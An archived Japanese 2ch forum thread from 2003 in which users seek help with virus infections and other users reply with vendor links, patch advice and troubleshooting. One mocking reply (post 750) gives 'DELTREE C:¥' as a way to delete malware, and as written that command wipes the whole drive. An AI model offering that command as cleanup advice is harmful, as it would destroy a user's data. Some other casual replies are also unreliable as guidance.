W32.HLLW.Cult.C@mm
http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.cult.c@mm.html
W32.HLLW.Cult.B@mm
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.cult.b@mm.html

643 :名無しさん@お腹いっぱい。:03/04/03 16:15
Attacked port 25 smtp 上昇中
http://isc.incidents.org/

644 :名無しさん@お腹いっぱい。:03/04/03 17:04
はじめまして。
98を使ってるんですが、最近ネットをして数時間経つと
ページが表示できなくなります。
バスターに反応なし、spybot等で怪しいものを削除もしてみました。
それでもやはり、同じ現象が起きるんです。
で、今気づいたんですがスタートメニューのお気に入りファイルに
青い米印のようなマークがついてるんです…あと終了のパソマークの画面にも…
これってウイルスなんでしょうか?
もう頻繁にフリーズしたり、ビジー状態のエラーがでるので
換え時かとは思うんですが、諸事情により今はまだこのまま使用するつもりです。
何か対策等ありましたらよろしくお願いします。
長文失礼しました。

ぼるじょあさんのとこにいったんですけど、マジレス希望はこちらへとの
ことでしたので、お伺いしました。

645 :名無しさん@お腹いっぱい。:03/04/03 17:07
>>644
マルチ氏ね。

646 :名無しさん@お腹いっぱい。:03/04/03 17:08
チャットをしてるとよく荒らしがきてあらしていくんですが・・・
なんかタグを使ってるらしくていっつPCが逝きます。
どなたかそんな攻撃を無効にする方法しりませんか?
あったら是非教えてください、お願いします。
ちなみにPCはWindowsです。

647 :ぼるじょあ ◆yBEncckFOU :03/04/03 17:09
( ・3・)オヨヨ  まるてぃはしちゃいけないんですYO

648 :名無しさん@お腹いっぱい。:03/04/03 17:09
>>644
アンチウィルスソフトやスパイウェア検知ソフトで見つからなければ、
PCの不調の可能性が高い。
板違いだが、必要なファイルのバックアップをとって
クリーンインストールをお勧めする。

649 :名無しさん@お腹いっぱい。:03/04/03 17:11
>>644
リソース教えれ
>>646
チャットを管理してる管理人に言った方が早い。

650 :名無しさん@お腹いっぱい。:03/04/03 17:15
>>646マルチにつき放置願います。
http://pc.2ch.net/test/read.cgi/sec/1047648810/575

651 :644:03/04/03 17:22
>>649
リソースってシステムリソースってやつですか?
今調べたら、48%の空きとなってました。

>>648
やっぱりそうですよね…ただ仕事で使用しているものなので
ちょっと躊躇してます(インストやったことないので)

>>647
マルチすいませんでした


652 :名無しさん@お腹いっぱい。:03/04/03 17:27
スイマセン。質問です。
友達から添付ファイル付きの変なメールが着てると言われたので
アドレスを教えてもらったら、自分の会社のアドレスでした。
会社で送信済みフォルダを調べたところそんな形跡はありませんでした。
そして添付ファイルは2ちゃんのとあるスレでHTML形式でした。
しかも、会社には友達のメアドは登録してませんし、2ちゃんは見れないのです。
これは一体どういう事なのでしょうか?
申し訳ありませんが分かる方、教えてください。


653 :名無しさん@お腹いっぱい。:03/04/03 17:38
>>651
48か…やっぱりクリーンインストールの方が早い。
↓あぶりだし





654 :名無しさん@お腹いっぱい。:03/04/03 17:56
>>652
いまどきこんな認識のヤシがまだ居るんだなぁ…
・ウィルスは差出人を偽装することがある。
http://www.nai.com/japan/virusinfo/viruscartoon.asp?ViruGazoMokujiNo=2
・ウィルスはメーラを使わずに独自のSMTPを使うことが多いので、
メーラに送信ログは残らない。
・ウィルスは感染者のHDDから適当なファイルを添付して送ることがある。

何というウィルスか分からないと、抽象的に答えることしかできない。
アンチウィルスソフト常駐させとけよ。

655 :名無しさん@お腹いっぱい。:03/04/03 18:16
>>652はここも読んどく。
コンピュータウイルス関連 FAQ
http://www.ipa.go.jp/security/virus/faq/qa_top.html

656 :名無しさん@お腹いっぱい。:03/04/03 18:19
「ウイルスに狙われるファイル共有サービス,設定を見直せ」――IPAが警告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030403/1/

657 :652:03/04/03 18:55
みなさん。レスありがとうございます。
自分があまりにも無知でした。
セキュリティソフト購入します。

ノートンのアンチウィルスとインターネットセキュリティ
のどちらかの購入を考えてまが、迷います。
やはりインターネットセキュリティを買った方が無難で
しょうか?

質問ばっかでスイマセン。

658 :名無しさん@お腹いっぱい。:03/04/03 18:57
>>657
常時接続でルータ入れてないなら、NIS。
ただしスペックの低いマシンで特にWin9X系だときつい。

659 :652:03/04/03 19:01
さっそくレスありがとうございます。

PCは少し前に買ったのでスペック的には問題ないと
思います。

NISとアンチウィルスの違いってNISにはアンチウィルス以外の機能が
あって、アンチウィルスにはその機能しかないって事ですか?



660 :名無しさん@お腹いっぱい。:03/04/03 19:06
>>659
NISにはファイヤーウォールと保護者機能(エログロサイト抑制)がNAVに追加されてる、
つーかノートンスレhttp://pc.2ch.net/test/read.cgi/sec/1048433756/l50
シマンテックのサイトhttp://www.symantec.com/region/jp/見てくれよ。

661 :652:03/04/03 19:16
>>660
わざわざありがとうございます。
今度から自分で勉強してから質問します。

ご迷惑おかけして申し訳ありませんでした


662 :名無しさん@お腹いっぱい。:03/04/03 19:56
W32.Opaserv.G.Worm について進入経路をご存知の方、情報下さい。

今朝会社に来てみたら10台ぐらいのWin95/98PCがOpaservを検知しておりました。
各PCにはNorton Antivirus Copration Edition が導入されています。

インターネット接続は限られたPCにしか許可していませんし、FWで必要なもの(開いているのはwebとメールぐらい)以外のポートは閉じてあります。
しかし進入されてしまいました。
おそらく何台かに接続されているAirH"からの進入だと思うのですが、駆除ツールを使って感染しているPCを探しましたが見つかりませんでした。

Symantecのサイト見るとファイル共有から感染すると書かれていますが、これはポート137-139を閉じれば防げますでしょうか?
それともまったく別の方法で進入されているのでしょうか?

ご存知の方、よろしくお願いいたします。

(文章めちゃめちゃで済みません)

663 :名無しさん@お腹いっぱい。:03/04/03 20:01
>>662ちゃんと書いてある。
http://www.symantec.com/region/jp/sarcj/data/w/w32.opaserv.g.worm.html
このワームはMicrosoft Windows 95/98/Meのセキュリティ上の脆弱性を利用します。ワームは1文字のパ
スワードをネットワーク共有に送信することで、Windows 95/98/Meのファイル共有に割り当てられているパ
スワード全部を知らなくても、そのファイル共有にアクセスできるようにします。この脆弱性の影響を受けるシ
ステムはWindows 95/98/Meです。

上記のOSを稼動しているコンピュータ用の修正プログラムは、下記ページからダウンロードいただけます。
http://www.microsoft.com/japan/technet/security/bulletin/MS00-072.asp
上記OSをお使いの方でまだ修正プログラムを適用していないお客様は、必ず修正プログラムを適用して今
後の感染を防止してください。

664 :629:03/04/03 20:43
すみません、>>629は前例がないと言うことで
しょうか?それとも過去ログ読めと言うことで
しょうか?どんな事でも良いので一言お願いします。

665 :名無しさん@お腹いっぱい。:03/04/03 20:58
>>663
原因わかりました
やはり個人持込のAirH"でした

ご面倒おかけいたしました。ありがとうございます。



666 :cheshire-cat ◆CATBCJABLA :03/04/03 21:03
>>629
該当しうるケースが多すぎて、それぞれのレスに対してみんな個別に対処できないんすよ。

http://www.aa.alpha-net.ne.jp/sharkey/startpage.htm
http://www.geocities.co.jp/SiliconValley-SanJose/3220/startpage.htm
http://support.microsoft.com/default.aspx?scid=kb;ja;JP320159
http://home10.highway.ne.jp/junsekai/PQR_top.htm
http://members.tripod.co.jp/tef_tef/trouble/adult.html
http://www95.sakura.ne.jp/~jksg/sub/yakudachi/PC_yakudachi_1.htm


667 :>>629:03/04/03 21:08
http://pc2.2ch.net/test/read.cgi/pcqa/1047359426/1-20
お逝きなさい・・・・

668 :名無しさん@お腹いっぱい。:03/04/04 03:27
>>629
>>1
ウィルスかどうかはウィルススキャンして判断してください。

669 :名無しさん@お腹いっぱい。:03/04/04 08:00
age

670 :bloom:03/04/04 09:00
http://www2.leverage.jp/start/

671 :名無しさん@お腹いっぱい。:03/04/04 14:45
age

672 :名無しさん@お腹いっぱい。:03/04/04 15:02
HTML_SAURAに感染しました。
削除はしたのですが今まで見ることが出来たのに見られなくなってしまったファイルが
結構あります。どうすれば直るのでしょうか。

673 :672:03/04/04 15:47
今までデジカメでとった写真とかも全部見られなくなってしまったんですけど
どうしたら良いんですか?

674 :名無しさん@お腹いっぱい。:03/04/04 15:49
>>672-673
検出したウイルス対策ソフト名は何?

675 :672:03/04/04 15:50
ウィルスバスター2002です

676 :名無しさん@お腹いっぱい。:03/04/04 15:52
>>675
「HTML_SAURA」で検出名はあってる?データベースに見つからないんだが・・・・・

677 :672:03/04/04 15:57
HTML_SAUR.A かまたは HTML_SAUR,Aでした

678 :672:03/04/04 16:02
間違ってました。
HTML_SUAR.Aでした

679 :名無しさん@お腹いっぱい。:03/04/04 16:05
>>678
やっと検索に引っかかりました。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_SUAR.A

ブラクラなので、検出されたファイルを全て削除すれば大丈夫のはず。

680 :名無しさん@お腹いっぱい。:03/04/04 16:11
HTML_SUAR.AはHTML文書の中に記述が加えられるものだから、見られなくなったファイルってHTML文書かな?
>特に感染マシン上でファイルコピーやレジストリ改変などのシステム改変は行いません。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_SUAR.A

681 :672:03/04/04 16:13
>>679
ありがとう御座います。早速試してみます。
>>680
HTMLとJPG全部です。
撮りだめした写真が見られなくなって必死になってます。

682 :名無しさん@お腹いっぱい。:03/04/04 16:15
>>681
jpgには影響ないよ。HTML自体はあきらめても、jpg画像だけなら影響を受けてないはずなんだけど。

683 :672:03/04/04 16:16
HTMLファイルとJPGファイルは今までのアイコンとは変わってしまって
ウィンドウズの旗マークになってます。

684 :672:03/04/04 16:18
そうですよね。何故こんな事になってしまったのか。

685 :名無しさん@お腹いっぱい。:03/04/04 16:18
>>683
リソース不足でアイコンが変わってしまったと思われるので、
一旦再起動してみて下さい。

HTML_SUAR.Aはファイル削除とかはしないので、再起動しても大丈夫です。

686 :名無しさん@お腹いっぱい。:03/04/04 16:20
>>683
ファイルの関連付けが壊れたんだろう。
例えばhttp://www.microsoft.com/japan/enable/training/kblight/T006/4/16.htm

687 :672:03/04/04 16:25
拡張子もJPGになってるのにファイル形式を特定できませんってでます。
(;;)うう

688 :672:03/04/04 16:28
縮小表示はできるんですけどどうしてもファイルを開く事が出来ません。
レスいっぱいしてごめんなさい。必死なもので。

689 :名無しさん@お腹いっぱい。:03/04/04 16:28
>>687指示されたとおりにやってるのかな。
再起動、もしくはフォルダオプション。

690 :名無しさん@お腹いっぱい。:03/04/04 16:30
一方通行みたいなので回答から降ります。あとはどなたかよろしくです。

691 :名無しさん@お腹いっぱい。:03/04/04 16:31
画像の破壊は行なわないウイルス(ウイルスとも呼べないような)なんだが…

692 :名無しさん@お腹いっぱい。:03/04/04 16:37
おーい、いないなら俺も帰るぞ。
ヤフーのJPG画像も駄目なら別問題だな。

693 :672:03/04/04 16:41
すいません。再起動してました。

694 :672:03/04/04 16:42
フォルダオプションをどうすればいいのでしょうか?

695 :名無しさん@お腹いっぱい。:03/04/04 16:51
>>694
その前に、その画像はIEで見れる?

696 :672:03/04/04 16:59
>>695
今やってみたらIEでは見られました。
それからスタート→プログラム→マイクロソフトオフィスツール→フォトエディター
でやれば見られることに今気付きました。
でもマイドキュメントから開こうとすると出来ません。

697 :名無しさん@お腹いっぱい。:03/04/04 17:03
>>696
http://pc2.2ch.net/test/read.cgi/pcqa/1047359426/3
ここのA10をやってみてください。

698 :672:03/04/04 17:14
A10をやって再起動したらHTML文書は見られるようになりました。
ありがとうございました。
でもJPEGは開けないままです。

699 :名無しさん@お腹いっぱい。:03/04/04 17:20
マイドキュメントのフォルダ設定をいじってみてください。
設定は画像関連を。

700 :672:03/04/04 17:52
遅くなってすいません。
いろいろフォルダ設定とかいじって再起動してるんですけどうまくいきません

701 :672:03/04/04 18:08
長々とありがとう御座いました。
とりあえずスキャンディスクしてみます。

702 :629:03/04/04 23:05
皆さんありがとうございますた。
半分治りますた。

703 :名無しさん@お腹いっぱい。:03/04/05 05:00
このスレには誘導されて来ても「マルチ氏ねマルチ放置」と
まるで機械のようにほざくアフォがいます。

704 :名無しさん@お腹いっぱい。:03/04/05 07:16
「貴方のPCはウィルスに感染しています。
このツールで駆除しなさい」とウィルスプログラムが付属されていた。
ガクガク。

705 :名無しさん@お腹いっぱい。:03/04/05 13:10
>>704.
どのウィルスソフトで「貴方〜」の文章が表示されたのか。
どうして備え付けられていたプログラムがウィルスだとわかったのか。
そのあたりをまず教えてほしい。

706 :名無しさん@お腹いっぱい。:03/04/05 22:57
age

707 :名無しさん@お腹いっぱい。:03/04/06 20:17
今日、以下のようなヘッダーの件名なし、アドレスなし、
ウィルス添付ファイルあり(HIELPEHI.EXE)のメールが来たんですが、
送り主(相手のプロバイダだけでも)を突き止めることは可能でしょうか?

Date: Sun, 6 Apr 2003 17:49:55 +0900 (JST)
Message-Id: <200304060849伏せますね@mail.伏せますね.co.jp>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="--VEYBW127KDY705"



708 :名無しさん@お腹いっぱい。:03/04/06 20:26
>>707
日付とContent-Typeだけでわかるわけねーだろカス

709 :名無しさん@お腹いっぱい。:03/04/06 20:31
>707 肝心なアレがない。

710 :707:03/04/06 20:37
>708-709
ヘッダーがこれだけだったんですよ。
漏れも通常のヘッダーなら対処法がわかったんですが…
やっぱりむりですか…

711 :名無しさん@お腹いっぱい。:03/04/06 20:45
>>707
自分で自分にメル送ってヘッダみてみ。

712 :名無しさん@お腹いっぱい。:03/04/06 20:52
>711 独自 MTU なんでしょう。きっと。

713 :名無しさん@お腹いっぱい。:03/04/06 20:57
だめだ、寝よ…
×MTU
○MTA

714 :名無しさん@お腹いっぱい。:03/04/06 20:59
>>712
Max Transfer Unit?
という突っ込みはさておき、自ISPから送られた場合はRecieved抑制する場合もある。
例: かつての和ジオ

715 :707:03/04/06 20:59
>711-712
すみません、意味がよく解かりません。
それと、このメルアド、受信ONLYのフリーメールアドレスなので
送信できません。

昨日来たウィルスメールは通常のヘッダーだったので
プロバイダに通報できたんですが…(´・ω・`)

716 :ぼるじょあ ◆yBEncckFOU :03/04/06 21:04
(・3・) エェー ボクウイルス入りの添付ファイル付きメールなんて貰った事がないんだがYO

717 :707:03/04/06 21:06
あ、リロードしていなかったら…
でもMTAでも意味が解からなかったり……(´・ω・`)

>714
実は和塩のアドレスなので、
和塩から送られてきたはずはないんですけどねぇ…

なんか変なウィルスメールだと思ったので
ちょっと気になって

718 :名無しさん@お腹いっぱい。:03/04/06 21:37
>>717
和ジオか、垢残ってたので試してみたら和ジオはrecieved追加しないので直送されたら判別不可能。
ウイルスくらいでオタオタしないよう精神力を鍛えろ。

719 :707:03/04/06 22:06
>718
レスどうも。
いやこのアドレス、サイトで公開しているせいか
殆ど毎日のようにウィルスが…
サイトは1日訪問者が5人くらいの超ピコなんですけどね…
精神力を鍛えます。

720 :名無しさん@お腹いっぱい。:03/04/06 22:40
>>719
ブラウザキャッシュからメアド拾うウイルスもある
mailtoのリンクは外しておいた方が吉。

721 :質問れす:03/04/07 01:47
ウイルスに感染すると、自分が送ったメールには『必ず』ウイルスつき添付ファイルがつくんでしょうか?

722 :名無しさん@お腹いっぱい。:03/04/07 05:18
んなわけない
ちったぁ勉強しろ

723 :名無しさん@お腹いっぱい。:03/04/07 08:25
age

724 :707:03/04/07 08:40
>720
レス、Thx!
無料のメールフォームサービスにアドレスを変更して
mailtoを外しました。

725 :質問れす:03/04/07 10:15
それじゃあ、たとえばklezなんかに感染した場合、
アドレス帳に自分のメアドを登録して、インターネットに接続していれば来るんでしょうか?


726 :名無しさん@お腹いっぱい。:03/04/07 11:09
>>725
http://pc.2ch.net/sec/kako/1018/10182/1018248786.html
http://pc.2ch.net/sec/kako/1021/10211/1021137509.html
http://pc.2ch.net/sec/kako/1024/10242/1024255721.html
http://pc.2ch.net/test/read.cgi/sec/1030175440/

727 :名無しさん@お腹いっぱい。:03/04/07 13:34
よろしくお願いします。

2CHの実況・スポーツ・MotoGp鈴鹿で、
cgi.io-websight.com/index2/uploader/img/hare2284.jpg
というのをクリックしたところ、

「ウイルスをダウンロードします」
「hack.exeをダウンロードします」
「危険ですので、電源を切らないでください」
と表示されて、ダウンロード終了後、
ドクロの上に「THE END」とかかれた画像が出てきたのですが、
ネットで調べて見ても良く解からず、
ネット上でウイルススキャンしてもウイルスは発見できず、自分のパソコンがウイルスに感染しているかどうかも解からない状態です。
何しろウイルス初体験ですので、どうすればいいのか解かりません。
どなたか、教えていただけないでしょうか?
ちなみに私の環境は、win98se,IE6.0,Norton Antivirus5.0
自分勝手な質問で申し訳ありませんが、よろしくお願いします

728 :名無しさん@お腹いっぱい。:03/04/07 13:47
>>727
画像が表示されただけです、ウィルスでもなんでもありません
普通は笑うところを、本気になって焦っているだけです

なんでもかんでも踏む癖を直しましょう

729 :名無しさん@お腹いっぱい。:03/04/07 13:58
728さん、どうもありがとうございました。
「THE END」と出た瞬間、目の前が真っ暗になりました。
おっしゃる通り、これからは気をつけます。
ありがとうございました。

730 :名無しさん@お腹いっぱい。:03/04/07 14:15
>>729.
ジョークでよかったね。中には本当にいたずらするのもあるので、
これから注意して楽しいネットライフを送ろう。
たぶん、2000年の暮れにはやったやつだと思う。
似たようなので、「ハッキングされています」とか、
「個人情報を編集しています」が出て「完了しました。転送します」とかもある。

この手のものは慣れるか近寄らないかくらいしか対策のしようが無いからねぇw

731 :名無しさん@お腹いっぱい。:03/04/07 14:25
>>730
本当に良かったです。
今まで「自分は大丈夫だろう」なんて思ってたけど、
今回の事でセキュリティーの重要性に気づかされました。
これからはむやみやたらと開かないよう、注意したいと思います。
どうもお騒がせしました。
それでは。

732 :名無しさん@お腹いっぱい。:03/04/07 16:29
ゾーンアラームを入れているんですが、PC立ち上げるたびに、
svchost.exeっていうのがサーバーとして動こうとします。

これはなんだろ?と思って調べたんですが、
トロイの木馬に感染すると同じ名前のファイルが作られるそうで・・。
けど、svchost.exe自体は有効なファイルだからこれがあるからといって
必ず感染してるわけではないとも書かれていました。

で、どうやって見分ければいいのかわからないでの、教えてください。
普通にオンラインのウィルススキャンして引っかからなければ、
問題ないでしょうか?

733 :名無しさん@お腹いっぱい。:03/04/07 18:22
>>732
アンチウィルスソフト入れてないのか?

734 :名無しさん@お腹いっぱい。:03/04/07 21:40
>>732
OSもレジストリーキーも分からないんじゃ・・

アンチウィルスソフト定義ファイルを最新にし、セーフモードで起動したら
隈なくシステム全体をスキャンしとけ。


735 :名無しさん@お腹いっぱい。:03/04/08 07:39
質問です。既出でしたらスイマセン。

先日、クレズらしきウィルスに感染したのですが
ノートン アンチウィルスでスキャンしても検出されませんでした。
感染していなければいいのですが、差出人を偽ってアドレス帳に
登録してあるアドレスに勝手に送信するウィルスってクルズですよね?

しかしスキャンした結果、VBS.LoveLetter.Aに感染していました。
これが、メールを勝手に送っているのでしょうか?
それとも、クルズはアンチウィルスでスキャンしても
検出されないのでしょうか?

教えて君で誠に申し訳ありませんが、アドバイスをお願い致します。

736 :名無しさん@お腹いっぱい。:03/04/08 07:47
VBS_MERASH.A に感染してしまい
オンラインスキャンしてそのファイルを削除したんですが
それだけで大丈夫でしょうか?

737 :名無しさん@お腹いっぱい。:03/04/08 08:06
質問するときは、OS、メーラ、検出したアンチウィルスソフトなど環境を
詳しく書くこと。ここの住人は超能力者ではありません。

検出したウィルス名が分かる場合、まずその検出したアンチウィルスソフトの
メーカーのウィルス辞典等で情報を調べるのが基本です。

ウィルスかどうかはウィルススキャンして判断してください。
挙動・メールの件名・添付ファイル名だけではウィルスかどうか確実に判断できません。

738 :名無しさん@お腹いっぱい。:03/04/08 08:07
>>735-736
いずれも過去ログに何度も出ているので、そこのリンク先参照。

739 :735:03/04/08 10:55
>>738
シマンテックからW32.Klez駆除ツールを落として
実行しました。
その結果、
Neither W32.Klez.gen@mm nor W32.ElKern.gen
were found on your computer.と出ました。

これは駆除が成功したと考えてよろしいのでしょうか?
そのあと、アンチウィルスも再インストールしました。

分かる方、アドバイスお願いします。


740 :名無しさん@お腹いっぱい。:03/04/08 11:02
>>739
シマンテックのサイト見ればわかることをきくなよ。
誰かに大丈夫と言ってもらいたい気持ちは分かるが…
>LiveUpdateを実行し、ウイルス定義を最新版に更新し、コンピュータの
>スキャンを再度実行します。NAV で修復できないファイルは削除してください。
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html

741 :名無しさん@お腹いっぱい。:03/04/08 11:53
スイマセン。心配性なもので。

ツールで駆除するまえに、アンチウィルスで試みたのですが
違うウィルスが発見され、クルズが発見されなかったので
本当に駆除出来たのか心配なんです。

LiveUpdateを実行して、ウイルス定義を最新版に更新し、
コンピュータの スキャンを再度実行したのですが
ウィルスが発見されなかったので、大丈夫だと
判断します。

色々ありがとうございました。


742 :名無しさん@お腹いっぱい。:03/04/08 17:58
age

743 :教えてください:03/04/08 18:08
既出でしたらすいません。とるものもとりあえずご質問します。
オンラインスキャンで、TROJ_VB.Hというウィルスが発見されました。
トレンドマイクロのウィルスデータにも載っておらず、対応にこまっており
ます。削除すればすめば良いのですが、どうか教えてください。
お願いいたします。


744 :教えてください:03/04/08 18:27
追伸です。
今、削除しようとしましたら、現在使用中のためアクセスできないとなり、
削除できません。どうすればよいでしょうか?

745 :名無しさん@お腹いっぱい。:03/04/08 18:33
>>743-744
>>737

746 :名無しさん@お腹いっぱい。:03/04/08 18:34
ほんとにOS書かないで質問するヤシ多いな。嫌がらせか?

747 :bloom:03/04/08 18:35
http://www2.leverage.jp/start/

748 :教えてください:03/04/08 19:20
すいませんでした。
ウィンドウズ98です。よろしくお願いいたします。
本当に困っております。


749 :教えてください:03/04/08 19:22
それと、メーラーはIEです。トレンドマイクロのオンラインスキャンで
判明しました。お願いします。

750 :名無しさん@お腹いっぱい。:03/04/08 19:28
>>743-744
( ´,_ゝ`)プッ MS−DOSモードで起動
         C:¥>DELTREE C:¥(ここは消したいキーを)
         削除しますか(Y/N)? で Y

          まっ、[ctrl]+[alt]+[del]で使用中のプロセスを終了させてから削除でもいいけどな。

751 :教えてください:03/04/08 19:38
>750
ご教示ありがとうございます。
情けないことですが、そのMS-DOSモードで起動するとはどういうこと
でしょうか。教えてください。

752 :名無しさん@お腹いっぱい。:03/04/08 19:54
>>751
(;´,_ゝ`)プッ スタート>Windowsの終了>MS-DOSモードで再起動 する。
         君は下の方法のほうがよさげ。

753 :教えてください:03/04/08 19:59
>752さん
ありがとうございます。MS−DOSモードで再起動したあと、DELTREE
までは行き着くにはどうしたらよいですか?Yで消してその後、どうすれば
よいでしょうか。初心者ですのでお手数をおかけします。
どうか教えてください。よろしくお願いいたします。

754 :名無しさん@お腹いっぱい。:03/04/08 20:15
>>753
(;;´,_ゝ`)プッ だから下のほうやれって。
         [ctrl]+[alt]+[del]で問題のプログラムを選択(赤く反転)>[終了]を♂
         その後、手動で削除出来るはずだ。

755 :教えてください:03/04/08 20:26
>754さん
わかりました。そちらでやってみます。
ありがとうございました。
また報告に参ります。

756 :教えてください:03/04/08 21:29
>754
その方法は不可能でした。プログラム使用中となっているというアラートが
でますが、ctrl+alt+delをしましても、そのプログラムは入ってません。
上の方法をおしえてください。お願いします。


757 :名無しさん@お腹いっぱい。:03/04/08 22:33
>>756
( ´,_ゝ`)プッ ほんとにちゃんとやったのか?
         じゃぁ、起動時にF8キー何度か押してセーフモードで起動。
         それで手動で削除できんか?

         MS−DOSモードでの削除はcdコマンドでディレクトリー指定、
         Dirコマンドで問題のプログラム検索、Delコマンド後エンターで削除。
         出来るか?PC初心者板のほうがよかれ。
         つーかネタに釣られちゃった・・・
         

758 :名無しさん@お腹いっぱい。:03/04/08 22:41
age

759 :教えてください:03/04/08 22:49
ネタではありません。
その問題のウィルス「TROJ_VB.H」が入ってるというファイルが、C:\WINDOWS
\ShellNew\explorer.exeであるとなってます。
これって、エクスプローラのプログラムファイルなのでしょうか?
削除したら大変なことになるのでしょうか?
どうか、教えてくださいませ。お願いします。

760 :cheshire-cat ◆CATBCJABLA :03/04/08 22:50
>>743-744
Safeモードで再起動して、これ使え。
Reboot File Deleter Ver.1.05
http://member.nifty.ne.jp/T_sugiyama/

761 :cheshire-cat ◆CATBCJABLA :03/04/08 22:53
>>759
ちょい待て。
漏れの760のレスを実行する前に、他のアンチウイルスソフトでスキャンしてみてみそ。

762 :名無しさん@お腹いっぱい。:03/04/08 23:01
>>760
( ´,_ゝ`) そんな便利グッツあったのネ

763 :名無しさん@お腹いっぱい。:03/04/08 23:05
>>759
http://www.symantec.com/region/jp/securitycheck/index.html
ここのセキュリティチェックのウィルススキャンやってみて。

764 :名無しさん@お腹いっぱい。:03/04/08 23:07
しかし、トレンドもウィルスデータベースにないトロイを検出すんなよ。
検出する以上はデータベースに載せとけよ。

765 :cheshire-cat ◆CATBCJABLA :03/04/08 23:15
>>764
トレンドの検出名は、他のベンダーやWILD LISTと全く関連が無い名称だったりするし。
またちょこちょこ名称を変えたりするから、整理しづらいっすね。

766 :教えてください:03/04/08 23:18
>760〜764さん
ありがとうございます。
763さんのおっしゃるように、いまからそのウィルススキャンやってみます。
また、報告にきます。みなさん、感謝します。

767 :名無しさん@お腹いっぱい。:03/04/08 23:19
( ´,_ゝ`) C:\WINDOWS \ShellNewにあるなら削除してよかれ。

768 :あぼーん:03/04/08 23:22
 ( ・∀・)< こんなのみつけたっち♪
http://muryou.gasuki.com/moe/hankaku10.html
http://muryou.gasuki.com/moe/hankaku09.html
http://muryou.gasuki.com/moe/hankaku08.html
http://muryou.gasuki.com/moe/hankaku07.html
http://muryou.gasuki.com/moe/hankaku06.html
http://muryou.gasuki.com/moe/hankaku05.html
http://muryou.gasuki.com/moe/hankaku04.html
http://muryou.gasuki.com/moe/hankaku03.html
http://muryou.gasuki.com/moe/hankaku02.html
http://muryou.gasuki.com/moe/hankaku01.html

769 :名無しさん@お腹いっぱい。:03/04/08 23:22
( ´,_ゝ`) まぁただのショートカットかもしれんが・・

770 :教えてください:03/04/09 00:13
いま、763さんの教えてくださったウィルスキャンをやっている最中です。
まだ、時間がかかりそうです。お風呂に入ってきましたがまだまだって感じです。
767さんの、ゆうとおりかとも思いますが、せっかくですので、ここのウィル
スチェックをすましてから、またいろいろ教えていただきたいと思います。
今回の、感染はアニメサイトであそんでたら、notfind的なところに行って適当に
飛ばされてこのような仕儀になった物と思われます。メールの添付云々ではあり
ませんので非常に心外です。このような、くだらない仕掛けを作った人に怒りで
す。私自身の貴重な時間のみならず、このようなものにお教えをいただく方々の
貴重な時間をお取りしてしまい、まことに感謝の念に耐えません。
どうか、今後ともよろしくご教示の程、お願いいたします。

771 :教えてください:03/04/09 01:06
763さんに教えていただいたsymantecのウィルススキャンでは、ウィルスは
検出されませんでした。ほっとしたと同時に、どうすればいいのかと戸惑います。
どうか、皆さん、これからもご教示お願いいたします。
このPCがだめになると、いろいろ大変なことになりますので、重ね重ね、おねがい
いたします。

772 :名無しさん@お腹いっぱい。:03/04/09 01:12
ウイルスに感染したみたいで、下のようなメッセージ勝手に送りまくって
PC起動するときlsass.exeエラーで強制シャットダウンされます・・・
なんていうウイルスでどうやって除去したらいいんでしょうか?
ウイルスバスターにも不正アクセスとしか出ないですしもうどうしたら・・

microsoft.com account auto-reply:

If you can keep your head when all about you
Are losing theirs and blaming it on you;
If you can trust yourself when all men doubt you,
But make allowance for their doubting too;
If you can wait and not be tired by waiting,
Or, being lied about,don't deal in lies,
Or, being hated, don't give way to hating,
And yet don't look too good, nor talk too wise;
... ... more look to the attachment.


773 :名無しさん@お腹いっぱい。:03/04/09 01:37
>>732を書き込んだものです。

環境をまったく書かないにも関わらず、即レスありがとうございます。
OSはXPproで、メーラーはEdmax、レジストリーキーはなんのことか解らないです・・・。
変な添付ファイルは開けていません。

アンチウィルスソフトは特に入れてなく、
定期的にトレンドマイクロのウイルスバスターオンラインスキャンでチェックしています。


774 :かおりん祭り:03/04/09 01:40
http://www.saitama.gasuki.com/kaorin/

  〜oノノハヽo〜
     ( ^▽^)/⌒\                       , −-
     ((ニ[二=(  こんなのがございま−−==≡≡す♪  ))
   /∧=:||  \_/                       `ー‐‐'
     じ/___/

775 :名無しさん@お腹いっぱい。:03/04/09 02:09
souchost.exe

これ何?

776 :名無しさん@お腹いっぱい。:03/04/09 10:32
age

777 :名無しさん@お腹いっぱい。:03/04/09 17:11
age

778 :教えてください:03/04/09 18:55
昨日はありがとうございました。symantecのウィルスチェックではウィルスは
でませんでしたが、相変わらずトレンドマイクロではTROJ_VB.Hというウィルス
がいて、削除できません。また、C\WINDOUS\shellNew\explorer.exeという
そのウィルスがいるといわれているファイルが、CドライブのWINDOUS
ディレクトリには、存在しません。今後どのように、対応すればよいのか教えて
下さい。みなさん、お願いいたします。

779 :教えてください:03/04/09 21:50
はああ、どうすればいいのでしょうか?
困り果てております。
どなたか、お助けください。

780 :名無しさん@お腹いっぱい。:03/04/09 21:54
>>779
思い切ってフォーマット→OS再インストール。
何の芸もないが、これが究極で最短の対応策かと思うが。

781 :名無しさん@お腹いっぱい。:03/04/09 22:02
>>778
トレンドの誤検出だろう。トロイ系に誤検出多い。

782 :age:03/04/09 22:05


783 :教えてください:03/04/09 22:37
>780さん,781さん、ありがとうございます。
再インストールも考えましたが、踏み切れません。もう少し頑張ってみます。
トレンドの誤検出だとすれば、ほんと、うれしいです。
symantecのウィルスチェックの方が正確ということでしょうか。だとすれば、
何もせずに無視していれば良いのですね。ご教示ありがとうございました。
初心者同然ですので、非常に弱気になってしまい仕事も手につきません。
さらにアドバイスなどありましたら、よろしくお願いいたします。
                            感謝!!


784 :名無しさん@お腹いっぱい。:03/04/09 23:37
>>783
昨日シマンテックの方もやってみれ、といわれてたのは
誤検出の可能性があるから。
シマンテックの方が正確というわけではないが、トレンドマイクロの方は
トロイ系の誤検出が多いので有名。

今後はアンチウィルスソフトを常駐させて、定義を最新にしておくこと。

785 :かおりん祭り:03/04/09 23:40
http://www.saitama.gasuki.com/kaorin/
       こんなのございま−す♪
